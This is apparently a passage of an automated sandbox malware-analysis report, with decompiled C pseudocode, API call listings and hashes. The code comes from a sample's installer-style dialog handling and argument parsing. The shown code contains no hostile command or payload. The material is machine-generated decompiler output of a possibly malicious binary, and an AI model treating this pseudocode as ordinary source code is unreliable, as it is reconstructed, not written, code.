                                                								}
                                                								goto L48;
                                                							}
                                                							if(_a8 == 0x413) {
                                                								L33:
                                                								_t285 = 0 | _a8 != 0x00000413;
                                                								_t239 = E00404C3B(_v8, _a8 != 0x413);
                                                								_t311 = _t239;
                                                								if(_t311 >= _t282) {
                                                									_t88 = _v20 + 8; // 0x8
                                                									_t285 = _t239 * 0x818 + _t88;
                                                									_t241 =  *_t285;
                                                									if((_t241 & 0x00000010) == 0) {
                                                										if((_t241 & 0x00000040) == 0) {
                                                											_t242 = _t241 ^ 0x00000001;
                                                										} else {
                                                											_t248 = _t241 ^ 0x00000080;
                                                											if(_t248 >= 0) {
                                                												_t242 = _t248 & 0x000000fe;
                                                											} else {
                                                												_t242 = _t248 | 0x00000001;
                                                											}
                                                										}
                                                										 *_t285 = _t242;
                                                										E0040117D(_t311);
                                                										_a12 = _t311 + 1;
                                                										_a16 =  !( *0x42a258) >> 0x00000008 & 0x00000001;
                                                										_a8 = 0x40f;
                                                									}
                                                								}
                                                								goto L41;
                                                							}
                                                							_t285 = _a16;
                                                							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                								goto L41;
                                                							}
                                                							goto L33;
                                                						} else {
                                                							goto L48;
                                                						}
                                                					} else {
                                                						L48:
                                                						if(_a8 != 0x111) {
                                                							L56:
                                                							if(_a8 == 0x200) {
                                                								SendMessageW(_v8, 0x200, _t282, _t282);
                                                							}
                                                							if(_a8 == 0x40b) {
                                                								_t219 =  *0x42370c;
                                                								if(_t219 != _t282) {
                                                									ImageList_Destroy(_t219);
                                                								}
                                                								_t220 =  *0x423720;
                                                								if(_t220 != _t282) {
                                                									GlobalFree(_t220);
                                                								}
                                                								 *0x42370c = _t282;
                                                								 *0x423720 = _t282;
                                                								 *0x42a2a0 = _t282;
                                                							}
                                                							if(_a8 != 0x40f) {
                                                								L88:
                                                								if(_a8 == 0x420 && ( *0x42a259 & 0x00000001) != 0) {
                                                									_t307 = (0 | _a16 == 0x00000020) << 3;
                                                									ShowWindow(_v8, _t307);
                                                									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                                								}
                                                								goto L91;
                                                							} else {
                                                								E004011EF(_t285, _t282, _t282);
                                                								_t192 = _a12;
                                                								if(_t192 != _t282) {
                                                									if(_t192 != 0xffffffff) {
                                                										_t192 = _t192 - 1;
                                                									}
                                                									_push(_t192);
                                                									_push(8);
                                                									E00404CBB();
                                                								}
                                                								if(_a16 == _t282) {
                                                									L75:
                                                									E004011EF(_t285, _t282, _t282);
                                                									_v32 =  *0x423720;
                                                									_t195 =  *0x42a268;
                                                									_v60 = 0xf030;
                                                									_v20 = _t282;
                                                									if( *0x42a26c <= _t282) {
                                                										L86:
                                                										InvalidateRect(_v8, _t282, 1);
                                                										if( *((intOrPtr*)( *0x42921c + 0x10)) != _t282) {
                                                											E00404BF6(0x3ff, 0xfffffffb, E00404C0E(5));
                                                										}
                                                										goto L88;
                                                									}
                                                									_t308 = _t195 + 8;
                                                									do {
                                                										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                                										if(_t201 != _t282) {
                                                											_t287 =  *_t308;
                                                											_v68 = _t201;
                                                											_v72 = 8;
                                                											if((_t287 & 0x00000001) != 0) {
                                                												_v72 = 9;
                                                												_v56 =  &(_t308[4]);
                                                												_t308[0] = _t308[0] & 0x000000fe;
                                                											}
                                                											if((_t287 & 0x00000040) == 0) {
                                                												_t205 = (_t287 & 0x00000001) + 1;
                                                												if((_t287 & 0x00000010) != 0) {
                                                													_t205 = _t205 + 3;
                                                												}
                                                											} else {
                                                												_t205 = 3;
                                                											}
                                                											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                                											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                											SendMessageW(_v8, 0x113f, _t282,  &_v72);
                                                										}
                                                										_v20 = _v20 + 1;
                                                										_t308 =  &(_t308[0x206]);
                                                									} while (_v20 <  *0x42a26c);
                                                									goto L86;
                                                								} else {
                                                									_t309 = E004012E2( *0x423720);
                                                									E00401299(_t309);
                                                									_t216 = 0;
                                                									_t285 = 0;
                                                									if(_t309 <= _t282) {
                                                										L74:
                                                										SendMessageW(_v12, 0x14e, _t285, _t282);
                                                										_a16 = _t309;
                                                										_a8 = 0x420;
                                                										goto L75;
                                                									} else {
                                                										goto L71;
                                                									}
                                                									do {
                                                										L71:
                                                										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
                                                											_t285 = _t285 + 1;
                                                										}
                                                										_t216 = _t216 + 1;
                                                									} while (_t216 < _t309);
                                                									goto L74;
                                                								}
                                                							}
                                                						}
                                                						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                							goto L91;
                                                						} else {
                                                							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
                                                							if(_t226 == 0xffffffff) {
                                                								goto L91;
                                                							}
                                                							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
                                                							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
                                                								_t310 = 0x20;
                                                							}
                                                							E00401299(_t310);
                                                							SendMessageW(_a4, 0x420, _t282, _t310);
                                                							_a12 = _a12 | 0xffffffff;
                                                							_a16 = _t282;
                                                							_a8 = 0x40f;
                                                							goto L56;
                                                						}
                                                					}
                                                				} else {
                                                					_v32 = 0;
                                                					_v16 = 2;
                                                					 *0x42a2a0 = _t306;
                                                					 *0x423720 = GlobalAlloc(0x40,  *0x42a26c << 2);
                                                					_t252 = LoadBitmapW( *0x42a240, 0x6e);
                                                					 *0x423714 =  *0x423714 | 0xffffffff;
                                                					_t313 = _t252;
                                                					 *0x42371c = SetWindowLongW(_v8, 0xfffffffc, E004052E5);
                                                					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                					 *0x42370c = _t254;
                                                					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                                					SendMessageW(_v8, 0x1109, 2,  *0x42370c);
                                                					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                					}
                                                					DeleteObject(_t313);
                                                					_t314 = 0;
                                                					do {
                                                						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                                						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                                							if(_t314 != 0x20) {
                                                								_v16 = _t282;
                                                							}
                                                							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E00406234(_t282, _t314, _t318, _t282, _t260)), _t314);
                                                						}
                                                						_t314 = _t314 + 1;
                                                					} while (_t314 < 0x21);
                                                					_t315 = _a16;
                                                					_t283 = _v16;
                                                					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                                					_push(0x15);
                                                					E004042D6(_a4);
                                                					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                                					_push(0x16);
                                                					E004042D6(_a4);
                                                					_t316 = 0;
                                                					_t284 = 0;
                                                					if( *0x42a26c <= 0) {
                                                						L19:
                                                						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                						goto L20;
                                                					} else {
                                                						_t302 = _v20 + 8;
                                                						_v28 = _t302;
                                                						do {
                                                							_t270 =  &(_t302[0x10]);
                                                							if( *_t270 != 0) {
                                                								_v60 = _t270;
                                                								_t271 =  *_t302;
                                                								_t294 = 0x20;
                                                								_v84 = _t284;
                                                								_v80 = 0xffff0002;
                                                								_v76 = 0xd;
                                                								_v64 = _t294;
                                                								_v40 = _t316;
                                                								_v68 = _t271 & _t294;
                                                								if((_t271 & 0x00000002) == 0) {
                                                									if((_t271 & 0x00000004) == 0) {
                                                										_t273 = SendMessageW(_v8, 0x1132, 0,  &_v84); // executed
                                                										 *( *0x423720 + _t316 * 4) = _t273;
                                                									} else {
                                                										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
                                                									}
                                                								} else {
                                                									_v76 = 0x4d;
                                                									_v44 = 1;
                                                									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                                									_v32 = 1;
                                                									 *( *0x423720 + _t316 * 4) = _t276;
                                                									_t284 =  *( *0x423720 + _t316 * 4);
                                                								}
                                                							}
                                                							_t316 = _t316 + 1;
                                                							_t302 =  &(_v28[0x818]);
                                                							_v28 = _t302;
                                                						} while (_t316 <  *0x42a26c);
                                                						if(_v32 != 0) {
                                                							L20:
                                                							if(_v16 != 0) {
                                                								E0040430B(_v8);
                                                								_t282 = 0;
                                                								goto L23;
                                                							} else {
                                                								ShowWindow(_v12, 5);
                                                								E0040430B(_v12);
                                                								L91:
                                                								return E0040433D(_a8, _a12, _a16);
                                                							}
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                			}





























































                                                0x00404cfc
                                                0x00404d0d
                                                0x00404d12
                                                0x00404d1a
                                                0x00404d20
                                                0x00404d28
                                                0x00404d36
                                                0x00404d39
                                                0x00404f5a
                                                0x00404f61
                                                0x00404f75
                                                0x00404f63
                                                0x00404f65
                                                0x00404f68
                                                0x00404f69
                                                0x00404f70
                                                0x00404f70
                                                0x00404f81
                                                0x00404f8f
                                                0x00404f92
                                                0x00404fa8
                                                0x0040501d
                                                0x00405020
                                                0x00405022
                                                0x0040502c
                                                0x0040503a
                                                0x0040503a
                                                0x0040503c
                                                0x00405046
                                                0x0040504c
                                                0x0040504f
                                                0x00405052
                                                0x0040506d
                                                0x00405054
                                                0x0040505e
                                                0x0040505e
                                                0x00405052
                                                0x00405046
                                                0x00000000
                                                0x00405020
                                                0x00404fad
                                                0x00404fb8
                                                0x00404fbd
                                                0x00404fc4
                                                0x00404fc9
                                                0x00404fcd
                                                0x00404fd8
                                                0x00404fd8
                                                0x00404fdc
                                                0x00404fe0
                                                0x00404fe4
                                                0x00404ff7
                                                0x00404fe6
                                                0x00404fe6
                                                0x00404fed
                                                0x00404ff3
                                                0x00404fef
                                                0x00404fef
                                                0x00404fef
                                                0x00404fed
                                                0x00404ffb
                                                0x00404ffd
                                                0x00405010
                                                0x00405013
                                                0x00405016
                                                0x00405016
                                                0x00404fe0
                                                0x00000000
                                                0x00404fcd
                                                0x00404faf
                                                0x00404fb6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405070
                                                0x00405070
                                                0x00405077
                                                0x004050e8
                                                0x004050f0
                                                0x004050f8
                                                0x004050f8
                                                0x00405101
                                                0x00405103
                                                0x0040510a
                                                0x0040510d
                                                0x0040510d
                                                0x00405113
                                                0x0040511a
                                                0x0040511d
                                                0x0040511d
                                                0x00405123
                                                0x00405129
                                                0x0040512f
                                                0x0040512f
                                                0x0040513c
                                                0x00405292
                                                0x00405299
                                                0x004052b6
                                                0x004052bc
                                                0x004052ce
                                                0x004052ce
                                                0x00000000
                                                0x00405142
                                                0x00405144
                                                0x00405149
                                                0x0040514e
                                                0x00405153
                                                0x00405155
                                                0x00405155
                                                0x00405156
                                                0x00405157
                                                0x00405159
                                                0x00405159
                                                0x00405161
                                                0x004051a2
                                                0x004051a4
                                                0x004051b4
                                                0x004051b7
                                                0x004051bc
                                                0x004051c3
                                                0x004051c6
                                                0x00405268
                                                0x0040526e
                                                0x0040527c
                                                0x0040528d
                                                0x0040528d
                                                0x00000000
                                                0x0040527c
                                                0x004051cc
                                                0x004051cf
                                                0x004051d5
                                                0x004051da
                                                0x004051dc
                                                0x004051de
                                                0x004051e4
                                                0x004051eb
                                                0x004051f0
                                                0x004051f7
                                                0x004051fa
                                                0x004051fa
                                                0x00405201
                                                0x0040520d
                                                0x00405211
                                                0x00405213
                                                0x00405213
                                                0x00405203
                                                0x00405205
                                                0x00405205
                                                0x00405233
                                                0x0040523f
                                                0x0040524e
                                                0x0040524e
                                                0x00405250
                                                0x00405253
                                                0x0040525c
                                                0x00000000
                                                0x00405163
                                                0x0040516e
                                                0x00405171
                                                0x00405176
                                                0x00405178
                                                0x0040517c
                                                0x0040518c
                                                0x00405196
                                                0x00405198
                                                0x0040519b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040517e
                                                0x0040517e
                                                0x00405184
                                                0x00405186
                                                0x00405186
                                                0x00405187
                                                0x00405188
                                                0x00000000
                                                0x0040517e
                                                0x00405161
                                                0x0040513c
                                                0x0040507f
                                                0x00000000
                                                0x00405095
                                                0x0040509f
                                                0x004050a4
                                                0x00000000
                                                0x00000000
                                                0x004050b6
                                                0x004050bb
                                                0x004050c7
                                                0x004050c7
                                                0x004050c9
                                                0x004050d8
                                                0x004050da
                                                0x004050de
                                                0x004050e1
                                                0x00000000
                                                0x004050e1
                                                0x0040507f
                                                0x00404d3f
                                                0x00404d44
                                                0x00404d4d
                                                0x00404d54
                                                0x00404d62
                                                0x00404d6d
                                                0x00404d73
                                                0x00404d81
                                                0x00404d95
                                                0x00404d9a
                                                0x00404da7
                                                0x00404dac
                                                0x00404dc2
                                                0x00404dd3
                                                0x00404de0
                                                0x00404de0
                                                0x00404de3
                                                0x00404de9
                                                0x00404deb
                                                0x00404dee
                                                0x00404df3
                                                0x00404df8
                                                0x00404dfa
                                                0x00404dfa
                                                0x00404e1a
                                                0x00404e1a
                                                0x00404e1c
                                                0x00404e1d
                                                0x00404e22
                                                0x00404e25
                                                0x00404e28
                                                0x00404e2c
                                                0x00404e31
                                                0x00404e36
                                                0x00404e3a
                                                0x00404e3f
                                                0x00404e44
                                                0x00404e46
                                                0x00404e4e
                                                0x00404f19
                                                0x00404f2c
                                                0x00000000
                                                0x00404e54
                                                0x00404e57
                                                0x00404e5a
                                                0x00404e5d
                                                0x00404e5d
                                                0x00404e64
                                                0x00404e6a
                                                0x00404e6d
                                                0x00404e73
                                                0x00404e74
                                                0x00404e79
                                                0x00404e82
                                                0x00404e89
                                                0x00404e8c
                                                0x00404e8f
                                                0x00404e92
                                                0x00404ece
                                                0x00404eef
                                                0x00404ef7
                                                0x00404ed0
                                                0x00404edd
                                                0x00404edd
                                                0x00404e94
                                                0x00404e97
                                                0x00404ea6
                                                0x00404eb0
                                                0x00404eb8
                                                0x00404ebf
                                                0x00404ec7
                                                0x00404ec7
                                                0x00404e92
                                                0x00404efd
                                                0x00404efe
                                                0x00404f0a
                                                0x00404f0a
                                                0x00404f17
                                                0x00404f32
                                                0x00404f36
                                                0x00404f53
                                                0x00404f58
                                                0x00000000
                                                0x00404f38
                                                0x00404f3d
                                                0x00404f46
                                                0x004052d0
                                                0x004052e2
                                                0x004052e2
                                                0x00404f36
                                                0x00000000
                                                0x00404f17
                                                0x00404e4e

                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404D05
                                                • GetDlgItem.USER32(?,00000408), ref: 00404D10
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D5A
                                                • LoadBitmapW.USER32 ref: 00404D6D
                                                • SetWindowLongW.USER32 ref: 00404D86
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D9A
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404DAC
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404DC2
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404DCE
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404DE0
                                                • DeleteObject.GDI32(00000000), ref: 00404DE3
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404E0E
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404E1A
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EB0
                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404EDB
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EEF
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404F1E
                                                • SetWindowLongW.USER32 ref: 00404F2C
                                                • ShowWindow.USER32(?,00000005), ref: 00404F3D
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040503A
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040509F
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004050B4
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004050D8
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050F8
                                                • ImageList_Destroy.COMCTL32(?), ref: 0040510D
                                                • GlobalFree.KERNEL32(?), ref: 0040511D
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405196
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040523F
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040524E
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040526E
                                                • ShowWindow.USER32(?,00000000), ref: 004052BC
                                                • GetDlgItem.USER32(?,000003FE), ref: 004052C7
                                                • ShowWindow.USER32(00000000), ref: 004052CE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
                                                • Instruction ID: fabf201a6726aaeed1f236dd7cd6744ceb795820712aa309ba6ddf90c5850425
                                                • Opcode Fuzzy Hash: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
                                                • Instruction Fuzzy Hash: A4027DB0A00209EFDF209F54CD85AAE7BB5FB44314F50817AE610BA2E0D7799E52DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E10001B18() {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				WCHAR* _v24;
                                                				WCHAR* _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				WCHAR* _v44;
                                                				signed int _v48;
                                                				void* _v52;
                                                				intOrPtr _v56;
                                                				WCHAR* _t199;
                                                				signed int _t202;
                                                				void* _t204;
                                                				void* _t206;
                                                				WCHAR* _t208;
                                                				void* _t216;
                                                				struct HINSTANCE__* _t217;
                                                				struct HINSTANCE__* _t218;
                                                				struct HINSTANCE__* _t220;
                                                				signed short _t222;
                                                				struct HINSTANCE__* _t225;
                                                				struct HINSTANCE__* _t227;
                                                				void* _t228;
                                                				intOrPtr* _t229;
                                                				void* _t240;
                                                				signed char _t241;
                                                				signed int _t242;
                                                				void* _t246;
                                                				struct HINSTANCE__* _t248;
                                                				void* _t249;
                                                				signed int _t251;
                                                				short* _t253;
                                                				signed int _t259;
                                                				void* _t260;
                                                				signed int _t263;
                                                				signed int _t266;
                                                				signed int _t267;
                                                				signed int _t272;
                                                				signed int _t273;
                                                				signed int _t274;
                                                				signed int _t275;
                                                				void* _t278;
                                                				void* _t282;
                                                				struct HINSTANCE__* _t284;
                                                				signed int _t287;
                                                				void _t288;
                                                				signed int _t289;
                                                				signed int _t301;
                                                				signed int _t302;
                                                				signed short _t308;
                                                				signed int _t309;
                                                				WCHAR* _t310;
                                                				WCHAR* _t312;
                                                				WCHAR* _t313;
                                                				struct HINSTANCE__* _t314;
                                                				void* _t316;
                                                				signed int _t318;
                                                				void* _t319;
                                                
                                                				_t284 = 0;
                                                				_v32 = 0;
                                                				_v36 = 0;
                                                				_v16 = 0;
                                                				_v8 = 0;
                                                				_v40 = 0;
                                                				_t319 = 0;
                                                				_v48 = 0;
                                                				_t199 = E1000121B();
                                                				_v24 = _t199;
                                                				_v28 = _t199;
                                                				_v44 = E1000121B();
                                                				_t309 = E10001243();
                                                				_v52 = _t309;
                                                				_v12 = _t309;
                                                				while(1) {
                                                					_t202 = _v32;
                                                					_v56 = _t202;
                                                					if(_t202 != _t284 && _t319 == _t284) {
                                                						break;
                                                					}
                                                					_t308 =  *_t309;
                                                					_t287 = _t308 & 0x0000ffff;
                                                					_t204 = _t287 - _t284;
                                                					if(_t204 == 0) {
                                                						_t33 =  &_v32;
                                                						 *_t33 = _v32 | 0xffffffff;
                                                						__eflags =  *_t33;
                                                						L17:
                                                						_t206 = _v56 - _t284;
                                                						if(_t206 == 0) {
                                                							__eflags = _t319 - _t284;
                                                							 *_v28 = _t284;
                                                							if(_t319 == _t284) {
                                                								_t246 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                								_t319 = _t246;
                                                								 *(_t319 + 0x1010) = _t284;
                                                								 *(_t319 + 0x1014) = _t284;
                                                							}
                                                							_t288 = _v36;
                                                							_t43 = _t319 + 8; // 0x8
                                                							_t208 = _t43;
                                                							_t44 = _t319 + 0x808; // 0x808
                                                							_t310 = _t44;
                                                							 *_t319 = _t288;
                                                							_t289 = _t288 - _t284;
                                                							__eflags = _t289;
                                                							 *_t208 = _t284;
                                                							 *_t310 = _t284;
                                                							 *(_t319 + 0x1008) = _t284;
                                                							 *(_t319 + 0x100c) = _t284;
                                                							 *(_t319 + 4) = _t284;
                                                							if(_t289 == 0) {
                                                								__eflags = _v28 - _v24;
                                                								if(_v28 == _v24) {
                                                									goto L39;
                                                								}
                                                								_t316 = 0;
                                                								GlobalFree(_t319);
                                                								_t319 = E10001311(_v24);
                                                								__eflags = _t319 - _t284;
                                                								if(_t319 == _t284) {
                                                									goto L39;
                                                								} else {
                                                									goto L32;
                                                								}
                                                								while(1) {
                                                									L32:
                                                									_t240 =  *(_t319 + 0x1ca0);
                                                									__eflags = _t240 - _t284;
                                                									if(_t240 == _t284) {
                                                										break;
                                                									}
                                                									_t316 = _t319;
                                                									_t319 = _t240;
                                                									__eflags = _t319 - _t284;
                                                									if(_t319 != _t284) {
                                                										continue;
                                                									}
                                                									break;
                                                								}
                                                								__eflags = _t316 - _t284;
                                                								if(_t316 != _t284) {
                                                									 *(_t316 + 0x1ca0) = _t284;
                                                								}
                                                								_t241 =  *(_t319 + 0x1010);
                                                								__eflags = _t241 & 0x00000008;
                                                								if((_t241 & 0x00000008) == 0) {
                                                									_t242 = _t241 | 0x00000002;
                                                									__eflags = _t242;
                                                									 *(_t319 + 0x1010) = _t242;
                                                								} else {
                                                									_t319 = E1000158F(_t319);
                                                									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
                                                								}
                                                								goto L39;
                                                							} else {
                                                								_t301 = _t289 - 1;
                                                								__eflags = _t301;
                                                								if(_t301 == 0) {
                                                									L28:
                                                									lstrcpyW(_t208, _v44);
                                                									L29:
                                                									lstrcpyW(_t310, _v24);
                                                									L39:
                                                									_v12 = _v12 + 2;
                                                									_v28 = _v24;
                                                									L63:
                                                									if(_v32 != 0xffffffff) {
                                                										_t309 = _v12;
                                                										continue;
                                                									}
                                                									break;
                                                								}
                                                								_t302 = _t301 - 1;
                                                								__eflags = _t302;
                                                								if(_t302 == 0) {
                                                									goto L29;
                                                								}
                                                								__eflags = _t302 != 1;
                                                								if(_t302 != 1) {
                                                									goto L39;
                                                								}
                                                								goto L28;
                                                							}
                                                						}
                                                						if(_t206 != 1) {
                                                							goto L39;
                                                						}
                                                						_t248 = _v16;
                                                						if(_v40 == _t284) {
                                                							_t248 = _t248 - 1;
                                                						}
                                                						 *(_t319 + 0x1014) = _t248;
                                                						goto L39;
                                                					}
                                                					_t249 = _t204 - 0x23;
                                                					if(_t249 == 0) {
                                                						__eflags = _t309 - _v52;
                                                						if(_t309 <= _v52) {
                                                							L15:
                                                							_v32 = _t284;
                                                							_v36 = _t284;
                                                							goto L17;
                                                						}
                                                						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
                                                						if( *((short*)(_t309 - 2)) != 0x3a) {
                                                							goto L15;
                                                						}
                                                						__eflags = _v32 - _t284;
                                                						if(_v32 == _t284) {
                                                							L40:
                                                							_t251 = _v32 - _t284;
                                                							__eflags = _t251;
                                                							if(_t251 == 0) {
                                                								__eflags = _t287 - 0x2a;
                                                								if(_t287 == 0x2a) {
                                                									_v36 = 2;
                                                									L61:
                                                									_t309 = _v12;
                                                									_v28 = _v24;
                                                									_t284 = 0;
                                                									__eflags = 0;
                                                									L62:
                                                									_t318 = _t309 + 2;
                                                									__eflags = _t318;
                                                									_v12 = _t318;
                                                									goto L63;
                                                								}
                                                								__eflags = _t287 - 0x2d;
                                                								if(_t287 == 0x2d) {
                                                									L131:
                                                									__eflags = _t308 - 0x2d;
                                                									if(_t308 != 0x2d) {
                                                										L134:
                                                										_t253 = _t309 + 2;
                                                										__eflags =  *_t253 - 0x3a;
                                                										if( *_t253 != 0x3a) {
                                                											L141:
                                                											_v28 =  &(_v28[0]);
                                                											 *_v28 = _t308;
                                                											goto L62;
                                                										}
                                                										__eflags = _t308 - 0x2d;
                                                										if(_t308 == 0x2d) {
                                                											goto L141;
                                                										}
                                                										_v36 = 1;
                                                										L137:
                                                										_v12 = _t253;
                                                										__eflags = _v28 - _v24;
                                                										if(_v28 <= _v24) {
                                                											 *_v44 = _t284;
                                                										} else {
                                                											 *_v28 = _t284;
                                                											lstrcpyW(_v44, _v24);
                                                										}
                                                										goto L61;
                                                									}
                                                									_t253 = _t309 + 2;
                                                									__eflags =  *_t253 - 0x3e;
                                                									if( *_t253 != 0x3e) {
                                                										goto L134;
                                                									}
                                                									_v36 = 3;
                                                									goto L137;
                                                								}
                                                								__eflags = _t287 - 0x3a;
                                                								if(_t287 != 0x3a) {
                                                									goto L141;
                                                								}
                                                								goto L131;
                                                							}
                                                							_t259 = _t251 - 1;
                                                							__eflags = _t259;
                                                							if(_t259 == 0) {
                                                								L74:
                                                								_t260 = _t287 - 0x22;
                                                								__eflags = _t260 - 0x55;
                                                								if(_t260 > 0x55) {
                                                									goto L61;
                                                								}
                                                								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
                                                									case 0:
                                                										__ecx = _v24;
                                                										__edi = _v12;
                                                										while(1) {
                                                											__edi = __edi + 1;
                                                											__edi = __edi + 1;
                                                											_v12 = __edi;
                                                											__ax =  *__edi;
                                                											__eflags = __ax - __dx;
                                                											if(__ax != __dx) {
                                                												goto L116;
                                                											}
                                                											L115:
                                                											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                											if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                												L120:
                                                												 *__ecx =  *__ecx & 0x00000000;
                                                												__ebx = E1000122C(_v24);
                                                												goto L91;
                                                											}
                                                											L116:
                                                											__eflags = __ax;
                                                											if(__ax == 0) {
                                                												goto L120;
                                                											}
                                                											__eflags = __ax - __dx;
                                                											if(__ax == __dx) {
                                                												__edi = __edi + 1;
                                                												__edi = __edi + 1;
                                                												__eflags = __edi;
                                                											}
                                                											__ax =  *__edi;
                                                											 *__ecx =  *__edi;
                                                											__ecx = __ecx + 1;
                                                											__ecx = __ecx + 1;
                                                											__edi = __edi + 1;
                                                											__edi = __edi + 1;
                                                											_v12 = __edi;
                                                											__ax =  *__edi;
                                                											__eflags = __ax - __dx;
                                                											if(__ax != __dx) {
                                                												goto L116;
                                                											}
                                                											goto L115;
                                                										}
                                                									case 1:
                                                										_v8 = 1;
                                                										goto L61;
                                                									case 2:
                                                										_v8 = _v8 | 0xffffffff;
                                                										goto L61;
                                                									case 3:
                                                										_v8 = _v8 & 0x00000000;
                                                										_v20 = _v20 & 0x00000000;
                                                										_v16 = _v16 + 1;
                                                										goto L79;
                                                									case 4:
                                                										__eflags = _v20;
                                                										if(_v20 != 0) {
                                                											goto L61;
                                                										}
                                                										_v12 = _v12 - 2;
                                                										__ebx = E1000121B();
                                                										 &_v12 = E10001A9F( &_v12);
                                                										__eax = E10001470(__edx, __eax, __edx, __ebx);
                                                										goto L91;
                                                									case 5:
                                                										L99:
                                                										_v20 = _v20 + 1;
                                                										goto L61;
                                                									case 6:
                                                										_push(7);
                                                										goto L107;
                                                									case 7:
                                                										_push(0x19);
                                                										goto L127;
                                                									case 8:
                                                										_push(0x15);
                                                										goto L127;
                                                									case 9:
                                                										_push(0x16);
                                                										goto L127;
                                                									case 0xa:
                                                										_push(0x18);
                                                										goto L127;
                                                									case 0xb:
                                                										_push(5);
                                                										goto L107;
                                                									case 0xc:
                                                										__eax = 0;
                                                										__eax = 1;
                                                										goto L85;
                                                									case 0xd:
                                                										_push(6);
                                                										goto L107;
                                                									case 0xe:
